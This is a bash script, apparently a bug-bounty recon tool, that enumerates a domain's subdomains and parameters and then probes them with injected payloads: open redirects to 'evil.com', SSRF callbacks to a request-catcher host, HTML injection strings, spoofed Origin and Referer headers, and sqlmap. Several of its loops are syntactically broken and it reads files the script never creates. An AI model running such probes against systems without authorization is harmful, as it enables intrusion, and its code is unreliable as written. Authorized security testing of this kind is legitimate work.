#! /bin/bash 
url=$1

figlet "TheLionRecon" | lolcat
echo "                 @Abbas Cyber Security    " | lolcat

if [ ! -d "$url" ]; then
      mkdir $url
fi
if [ ! -d "$url/recon" ]; then
      mkdir $url/recon
fi

if [ ! -d "$url/param_vuln" ]; then
          mkdir $url/param_vuln
fi

if [ ! -d "$url/subs_vuln" ]; then
          mkdir $url/subs_vuln
fi

if [ ! -d "$url/subs_vuln/false_positive" ]; then
          mkdir $url/subs_vuln/false_positive
fi

if [ ! -d "$url/param_vuln/false_positive" ]; then
          mkdir $url/param_vuln/false_positive
fi



#---------------------------------------------------------------------------------
#-----------------------------Finding SubDomains----------------------------------
#----------------------------------------------------------------------------------

echo "[+]Enumurating SubDomains Using Assetfinder..."
assetfinder $url >> $url/recon/assetfinder.txt
cat $url/recon/assetfinder.txt | grep $url >> $url/recon/final.txt
rm $url/recon/assetfinder.txt

echo "[+]Enumurating SubDomains Using SubFinder..."
subfinder -d $url -o $url/recon/subfinder.txt
cat $url/recon/subfinder.txt | grep $url >> $url/recon/final.txt
rm $url/recon/subfinder.txt

echo "[+]Enumurating SubDomains Using Findomain..."
findomain -t $url -q >> $url/recon/findomain.txt
cat $url/recon/findomain.txt | grep $url >> $url/recon/final.txt
rm $url/recon/findomain.txt

echo "[+]Enumurating SubDomains Using Amass..."
amass enum -d $url >> $url/recon/amass.txt
cat $url/recon/amass.txt | grep $url >> $url/recon/final.txt
rm $url/recon/amass.txt

echo "[+]Enumurating SubDomains Using Sublist3r..."
python3 /opt/Sublist3r/sublist3r.py -d $url -o $1/recon/sublist3r.txt
cat $url/recon/sublist3r.txt | grep $url >> $url/recon/final.txt
rm $1/recon/sublist3r.txt 

echo "[+]Filtering Repeated Domains........."
cat $url/recon/final.txt | sort -u | tee $url/recon/final_subs.txt 
rm $url/recon/final.txt 

echo "[+]Total Unique SubDomains"
cat $url/recon/final_subs.txt | wc -l
#--------------------------------------------------------------------------------------------------
#-----------------------------------Filtering Live SubDomains--------------------------------------
#--------------------------------------------------------------------------------------------------
echo "[]"
cat $url/recon/final_subs.txt | httpx --silent >> $url/recon/live_subs.txt
#------------------------------------------------------------------------------------------------------------
#--------------------------------------Taking LiveSubs ScreenShots-------------------------------------------
#------------------------------------------------------------------------------------------------------------
#/opt/EyeWitness/Python/EyeWitness.py -f $url/recon/livesubs.txt

#--------------------------------------------------------------------------------------------------
#-------------------------------Checking For SubDomain TakeOver------------------------------------
#--------------------------------------------------------------------------------------------------
echo "[+]Testing For SubTakeOver"
subzy --targets  $url/recon/final_subs.txt  --timeout 200  --hide_fails >> $url/subs_vuln/sub_take_over.txt
#--------------------------------------------------------------------------------------------------
#-------------------------------Checking For Open Ports------------------------------------
#--------------------------------------------------------------------------------------------------
#echo "[+] Scanning for open ports..."
#nmap -iL $url/recon/livesubs.txt -T4 -oA $url/recon/openports.txt
#--------------------------------------------------------------------------------------------------
#-----------------------------------Enumurating Parameters-----------------------------------------
#--------------------------------------------------------------------------------------------------
echo "[+]Enumurating Params From Paramspider...."
python3 /opt/ParamSpider/paramspider.py --level high -d $url -p noor -o $1/recon/params.txt
echo "[+]Enumurating Params From Waybackurls...."
cat $1/recon/fsubs.txt | waybackurls | grep = | qsreplace noor >> $url/recon/params.txt
echo "[+]Enumurating Params From gau Tool...."
gau --subs  $url | grep = | qsreplace noor >> $url/recon/params.txt 
echo "[+]Enumurating Params From gauPlus Tool...."
cat $url/recon/fsubs.txt | gauplus | grep = | qsreplace noor >> $url/recon/params.txt

echo "[+]Filtering Dups..."
cat $url/recon/params.txt | sort -u | tee $url/recon/fparams.txt 

rm $url/recon/params.txt

echo "[+]Total Unique Params Found"
cat $url/recon/fparams.txt | wc -l
#--------------------------------------------------------------------------------------------------
#-------------------------------Checking For Open Redirects----------------------------------------
#--------------------------------------------------------------------------------------------------
echo "[+]Testing For Openredirects"
cat $url/recon/fparams.txt | qsreplace 'http://evil.com' | while read host do ; do curl -s -L $host -I | grep "evil.com" && echo "$host" ;done > $url/recon/open.txt
#--------------------------------------------------------------------------------------------------
#-----------------------------------Checking For SSRF----------------------------------------------
#--------------------------------------------------------------------------------------------------
cat $url/recon/fparams.txt | qsreplace "https://noor.requestcatcher.com/test" | tee $url/recon/ssrftest.txt && cat $url/recon/ssrftest.txt | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "request caught" && echo "$host \033[0;31mVulnearble\n"; done >> $url/recon/eSSRF.txt
rm $url/recon/ssrftest.txt
#--------------------------------------------------------------------------------------------------
#-------------------------------Checking For HTMLi && RXSS-----------------------------------------
#--------------------------------------------------------------------------------------------------
echo "[+]Testing For HTML Injection"
cat $url/recon/fparams.txt | qsreplace '"><u>hyper</u>' | tee $url/recon/temp.txt && cat $url/recon/temp.txt | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "<u>hyper</u>" && echo "$host \033[0;31mVulnearble\n"; done > $url/recon/dq/htmli.txt
#--------------------------------------------------------------------------------------------------
#-----------------------------------Checking For Clickjacking--------------------------------------
#--------------------------------------------------------------------------------------------------
cat $url/recon/fsubs.txt | while read host do ; do curl -I -L --silent --path-as-is --insecure "$host" | grep -qs "x-frame-options" && echo "$host \033[0;31mNot\n" || echo  "$host  \033[0;31mVulnerable" ; done | grep Vulnerable >> $url/recon/clickjack.txt
#------------------------------------------------------------------------------------------------------------
#----------------------------------------------Checking For CORS---------------------------------------------
#------------------------------------------------------------------------------------------------------------
cat $url/recon/fsubs.txt | while read host do ; do curl $host --silent --path-as-is --insecure -L -I -H Origin:beebom.com | grep "beebom.com" && echo "$host" ; done >> $url/recon/cors.txt
#------------------------------------------------------------------------------------------------------------
#--------------------------------------Checking For XSS through Referer Header-------------------------------
#------------------------------------------------------------------------------------------------------------
cat $url/recon/fsubs.txt | while read host do ; do curl $host --silent --path-as-is --insecure -L -I -H Referer:https://beebom.com/ | grep "beebom.com" && echo "$host" ; done >> $url/recon/xssrefer.txt
#--------------------------------------------------------------------------------------------------
#---------------------------Checking For Sql Injection Vulnerability-------------------------------
#--------------------------------------------------------------------------------------------------
echo "[+]Testing For Sqli"
cat $url/recon/fparams.txt | python3 /opt/sqlmap/sqlmap.py
#------------------------------------------------------------------------------------------------------------
#---------------------------------Checking For Open redirects through X-Forwarded Header---------------------
#------------------------------------------------------------------------------------------------------------

#------------------------------------------------------------------------------------------------------------
#--------------------------------------Checking For CRLF Injection-------------------------------------------
#------------------------------------------------------------------------------------------------------------



